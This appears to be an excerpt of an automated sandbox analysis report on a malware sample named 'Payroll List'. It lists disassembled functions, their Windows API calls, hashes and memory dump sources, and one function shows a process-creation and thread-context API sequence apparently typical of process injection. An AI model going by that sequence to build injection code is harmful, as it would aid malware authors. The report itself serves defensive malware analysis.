                                                                    • Opcode ID: 8ca1fc87beee2e7cde8d41c371234d71b82ed75054e0467ab914a9c749b178aa
                                                                    • Instruction ID: 80e44090dfbd8e861a0d72342fa5fc868b6b16a01689cb281ca1459a7eaf31b7
                                                                    • Opcode Fuzzy Hash: 8ca1fc87beee2e7cde8d41c371234d71b82ed75054e0467ab914a9c749b178aa
                                                                    • Instruction Fuzzy Hash: A221FC70504B94AFEB379B24D855BEBBFEC9B05308F04048EE69F56181C3746A84CB51
                                                                    Function 001240E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00193725
                                                                    • GetOpenFileNameW.COMDLG32 ref: 0019376F
                                                                      • Part of subcall function 0012660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001253B1,?,?,001261FF,?,00000000,00000001,00000000), ref: 0012662F
                                                                      • Part of subcall function 001240A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001240C6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Name$Path$FileFullLongOpen_memset
                                                                    • String ID: X
                                                                    • API String ID: 3777226403-3081909835
                                                                    • Opcode ID: 97d273a243a45e866be6e30b824505bfac998d664276f961e30117dfcef01dad
                                                                    • Instruction ID: 91ec5d464af48aa5080190dd36aa28f178232cc30e59a45864c080d4d30efa68
                                                                    • Opcode Fuzzy Hash: 97d273a243a45e866be6e30b824505bfac998d664276f961e30117dfcef01dad
                                                                    • Instruction Fuzzy Hash: FE21E771A002A8AFCF05DFD4D8457DEBBF8AF99304F00401AE515BB241DBB45A998F65
                                                                    Function 0016C71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 0016C72F
                                                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0016C746
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Temp$FileNamePath
                                                                    • String ID: aut
                                                                    • API String ID: 3285503233-3010740371
                                                                    • Opcode ID: da9fe59bac0a66e64a8d22a92a68541d608640abaafb3b0723ca42851e2d23c2
                                                                    • Instruction ID: e8f6886f630ece63c31c4f9634f2da32c4d348851a41e0c82e279102eb01fc71
                                                                    • Opcode Fuzzy Hash: da9fe59bac0a66e64a8d22a92a68541d608640abaafb3b0723ca42851e2d23c2
                                                                    • Instruction Fuzzy Hash: C1D05E7550030EABDB10AB90EC0EFCA776C9700708F0002A27651A54B1DBB0E6D9CB55
                                                                    Function 0017F8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d268a57dff30748c6205d0509024e59fb5c8eb64cc40e6d81754d5ff083452ac
                                                                    • Instruction ID: 4ddfa200cab6347ba3b0a2919de9b01eb744c5d784429a06afeb6f04bc8c119c
                                                                    • Opcode Fuzzy Hash: d268a57dff30748c6205d0509024e59fb5c8eb64cc40e6d81754d5ff083452ac
                                                                    • Instruction Fuzzy Hash: B0F159716083019FCB14DF24C885B6AB7F5FF98314F14892EF9999B292D730E946CB82
                                                                    Function 0014395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __FF_MSGBANNER.LIBCMT ref: 00143973
                                                                      • Part of subcall function 001481C2: __NMSG_WRITE.LIBCMT ref: 001481E9
                                                                      • Part of subcall function 001481C2: __NMSG_WRITE.LIBCMT ref: 001481F3
                                                                    • __NMSG_WRITE.LIBCMT ref: 0014397A
                                                                      • Part of subcall function 0014821F: GetModuleFileNameW.KERNEL32(00000000,001E0312,00000104,00000000,00000001,00000000), ref: 001482B1
                                                                      • Part of subcall function 0014821F: ___crtMessageBoxW.LIBCMT ref: 0014835F
                                                                      • Part of subcall function 00141145: ___crtCorExitProcess.LIBCMT ref: 0014114B
                                                                      • Part of subcall function 00141145: ExitProcess.KERNEL32 ref: 00141154
                                                                      • Part of subcall function 00147C0E: __getptd_noexit.LIBCMT ref: 00147C0E
                                                                    • RtlAllocateHeap.NTDLL(00D10000,00000000,00000001,00000001,00000000,?,?,0013F507,?,0000000E), ref: 0014399F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                    • String ID:
                                                                    • API String ID: 1372826849-0
                                                                    • Opcode ID: 17c1c1d47ee5cfba872def292073950d30df46affb033431216195076c4b0c79
                                                                    • Instruction ID: b838a773c9d96c2768761d247e9617ab84ff27e7d0be668f2837ccf87a64aeb2
                                                                    • Opcode Fuzzy Hash: 17c1c1d47ee5cfba872def292073950d30df46affb033431216195076c4b0c79
                                                                    • Instruction Fuzzy Hash: BA01F035345742AAE6263B74DC86B2E3348DF92768F210025F515DB6F2DFF4DD808660
                                                                    Function 0016C6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0016C385,?,?,?,?,?,00000004), ref: 0016C6F2
                                                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0016C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0016C708
                                                                    • CloseHandle.KERNEL32(00000000,?,0016C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0016C70F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleTime
                                                                    • String ID:
                                                                    • API String ID: 3397143404-0
                                                                    • Opcode ID: 415da04c988d250ffdb0025b18ee59c3ecfcc985e35e155b3385cb1f956532a4
                                                                    • Instruction ID: 3bd49231f0a72246f0ed232fce2e281f837883a50e411fd00d89b8d59c14305e
                                                                    • Opcode Fuzzy Hash: 415da04c988d250ffdb0025b18ee59c3ecfcc985e35e155b3385cb1f956532a4
                                                                    • Instruction Fuzzy Hash: 88E08632240614B7DB211B54BC09FDA7B19EB06771F104110FB55698E097B125618798
                                                                    Function 0016BB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _free.LIBCMT ref: 0016BB72
                                                                      • Part of subcall function 00141C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00147A85), ref: 00141CB1
                                                                      • Part of subcall function 00141C9D: GetLastError.KERNEL32(00000000,?,00147A85), ref: 00141CC3
                                                                    • _free.LIBCMT ref: 0016BB83
                                                                    • _free.LIBCMT ref: 0016BB95
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
                                                                    • Instruction ID: 8e6d63bd279267f2ef50f02736562d670f13566a418ef2ec38d9807f1ff4b20f
                                                                    • Opcode Fuzzy Hash: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
                                                                    • Instruction Fuzzy Hash: C0E05BB175574157DA3465796EC4EB313CD4F14351714081DB459E7146CF24F8D085B4
                                                                    Function 00123A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • IsThemeActive.UXTHEME ref: 00123A73
                                                                      • Part of subcall function 00141405: __lock.LIBCMT ref: 0014140B
                                                                      • Part of subcall function 00123ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00123AF3
                                                                      • Part of subcall function 00123ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00123B08
                                                                      • Part of subcall function 00123D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00123AA3,?), ref: 00123D45
                                                                      • Part of subcall function 00123D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00123AA3,?), ref: 00123D57
                                                                      • Part of subcall function 00123D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,001E1148,001E1130,?,?,?,?,00123AA3,?), ref: 00123DC8
                                                                      • Part of subcall function 00123D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00123AA3,?), ref: 00123E48
                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00123AB3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                    • String ID:
                                                                    • API String ID: 924797094-0
                                                                    • Opcode ID: 20efaeef13dec70c2297b49bb2f0684074fa621d7ca49a12a27537d2189a7528
                                                                    • Instruction ID: a7a4741809000391a987f6fb48af5bdf71a11e6060b35f6ccb5c02413b892385
                                                                    • Opcode Fuzzy Hash: 20efaeef13dec70c2297b49bb2f0684074fa621d7ca49a12a27537d2189a7528
                                                                    • Instruction Fuzzy Hash: 1A119071904381ABC700EFA5E88590EFBE8FFA5710F00491EF4898B6B1DB709694CB92
                                                                    Function 0014E9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ___lock_fhandle.LIBCMT ref: 0014EA29
                                                                    • __close_nolock.LIBCMT ref: 0014EA42
                                                                      • Part of subcall function 00147BDA: __getptd_noexit.LIBCMT ref: 00147BDA
                                                                      • Part of subcall function 00147C0E: __getptd_noexit.LIBCMT ref: 00147C0E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                    • String ID:
                                                                    • API String ID: 1046115767-0
                                                                    • Opcode ID: 890cf4a9d5848a6f025ff78cf452ab07f3e00d43b0731d49fccc64b576279592
                                                                    • Instruction ID: 7fe2c0fb529384ec8afce877ae94d22ebb3598f2c1c1f4139a4db29c313e67b9
                                                                    • Opcode Fuzzy Hash: 890cf4a9d5848a6f025ff78cf452ab07f3e00d43b0731d49fccc64b576279592
                                                                    • Instruction Fuzzy Hash: AA11A1B2945A518AD712BFA8C88235C7AE1BF92335F3B4740E4255F1F3CBB48C4187A2
                                                                    Function 0013F4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0014395C: __FF_MSGBANNER.LIBCMT ref: 00143973
                                                                      • Part of subcall function 0014395C: __NMSG_WRITE.LIBCMT ref: 0014397A
                                                                      • Part of subcall function 0014395C: RtlAllocateHeap.NTDLL(00D10000,00000000,00000001,00000001,00000000,?,?,0013F507,?,0000000E), ref: 0014399F
                                                                    • std::exception::exception.LIBCMT ref: 0013F51E
                                                                    • __CxxThrowException@8.LIBCMT ref: 0013F533
                                                                      • Part of subcall function 00146805: RaiseException.KERNEL32(?,?,0000000E,001D6A30,?,?,?,0013F538,0000000E,001D6A30,?,00000001), ref: 00146856
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                    • String ID:
                                                                    • API String ID: 3902256705-0
                                                                    • Opcode ID: 2305f7feb3954d00f499861871d334313e3e0e278802205834bd790a069b9130
                                                                    • Instruction ID: b8a554500bb86939a977facc705d6af72ffa9cc9da3a3ce18a71e6f6aaff226f
                                                                    • Opcode Fuzzy Hash: 2305f7feb3954d00f499861871d334313e3e0e278802205834bd790a069b9130
                                                                    • Instruction Fuzzy Hash: A7F0C83150421EA7D704BF98ED059DE77EC9F12358F60402AF909E21A1DBB0D64586A6
                                                                    Function 001435E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00147C0E: __getptd_noexit.LIBCMT ref: 00147C0E
                                                                    • __lock_file.LIBCMT ref: 00143629
                                                                      • Part of subcall function 00144E1C: __lock.LIBCMT ref: 00144E3F
                                                                    • __fclose_nolock.LIBCMT ref: 00143634
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                    • String ID:
                                                                    • API String ID: 2800547568-0
                                                                    • Opcode ID: abc9a0194cd6e43622161498ff2f07f2331049e8aa93147b8b8640a1c761fff8
                                                                    • Instruction ID: 79f2dcd7f48e2012c11d85388520048a5c5afec0363afbe2dc8d0f1009ddd0e3
                                                                    • Opcode Fuzzy Hash: abc9a0194cd6e43622161498ff2f07f2331049e8aa93147b8b8640a1c761fff8
                                                                    • Instruction Fuzzy Hash: 2BF0B471901606AADB11BF7588027AE7AE06F62334F268109E435AB2F1CB7C8B019F56
                                                                    Function 00D56105 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 00D568C3
                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00D56959
                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00D5697B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1435038315.0000000000D54000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D54000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d54000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                    • String ID:
                                                                    • API String ID: 2438371351-0
                                                                    • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                                    • Instruction ID: 26df43b1fdb525faa7dcc3f3fd390882d5531ae0c46178cc20735a5d6a8e0e81
                                                                    • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                                    • Instruction Fuzzy Hash: 8212EF20E14658C6EB24DF60D8507DEB232EF68301F1090E9950DEB7A5E77A8F85CF5A
                                                                    Function 00142957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __flush.LIBCMT ref: 00142A0B
                                                                      • Part of subcall function 00147C0E: __getptd_noexit.LIBCMT ref: 00147C0E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: __flush__getptd_noexit
                                                                    • String ID:
                                                                    • API String ID: 4101623367-0
                                                                    • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                    • Instruction ID: b5d4c9b760c62e4a43c35d4bdfbd5a2ac20848b86f200ca1e6590a444489432d
                                                                    • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                    • Instruction Fuzzy Hash: CF41B3707007169FDB2C8EA9C8805AE7BA6AF84364B64852DF845C7660EBB0DDC18B40
                                                                    Function 0013ED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ProtectVirtual
                                                                    • String ID:
                                                                    • API String ID: 544645111-0
                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                    • Instruction ID: f660e22614b6652016532ca2abd5c7c05119ecb0ae5264ab32b96ff19233ce44
                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                    • Instruction Fuzzy Hash: 1B31D270A00205DBDB18DF98C480A69FBE6FF49350F6586A5E40ADB296DB31EDC1CB80
                                                                    Function 001241A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00124214: FreeLibrary.KERNEL32(00000000,?), ref: 00124247
                                                                    • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,001239FE,?,00000001), ref: 001241DB
                                                                      • Part of subcall function 00124291: FreeLibrary.KERNEL32(00000000), ref: 001242C4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Library$Free$Load
                                                                    • String ID:
                                                                    • API String ID: 2391024519-0
                                                                    • Opcode ID: 9b0a6b6330581d555f626c3a87a982574b91efdfb15fb738c4a793834d9cab99
                                                                    • Instruction ID: d3625a5215c087a788a97d70eccfb8d6d71d3969257c9efa5403f0ef2af821ae
                                                                    • Opcode Fuzzy Hash: 9b0a6b6330581d555f626c3a87a982574b91efdfb15fb738c4a793834d9cab99
                                                                    • Instruction Fuzzy Hash: BD11E331600226EBDF14FB75FC06F9E77E99F60700F108429F596AA1C1DB70DA619BA0
                                                                    Function 0014AF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ___lock_fhandle.LIBCMT ref: 0014AFC0
                                                                      • Part of subcall function 00147BDA: __getptd_noexit.LIBCMT ref: 00147BDA
                                                                      • Part of subcall function 00147C0E: __getptd_noexit.LIBCMT ref: 00147C0E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: __getptd_noexit$___lock_fhandle
                                                                    • String ID:
                                                                    • API String ID: 1144279405-0
                                                                    • Opcode ID: 876a8bc02c8c96e76302933d049ce283e43adc6ac5c89c0bd9b21cdbf417d78e
                                                                    • Instruction ID: dfa9b4a6a13a4aaa73313e20a7ba18305ce431772e54987030083d989f2d7949
                                                                    • Opcode Fuzzy Hash: 876a8bc02c8c96e76302933d049ce283e43adc6ac5c89c0bd9b21cdbf417d78e
                                                                    • Instruction Fuzzy Hash: 2F118FB28096509BD7166FA4988276E3A60AFA2336F264640F4345F1F2C7B4CD419BA2
                                                                    Function 001239DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
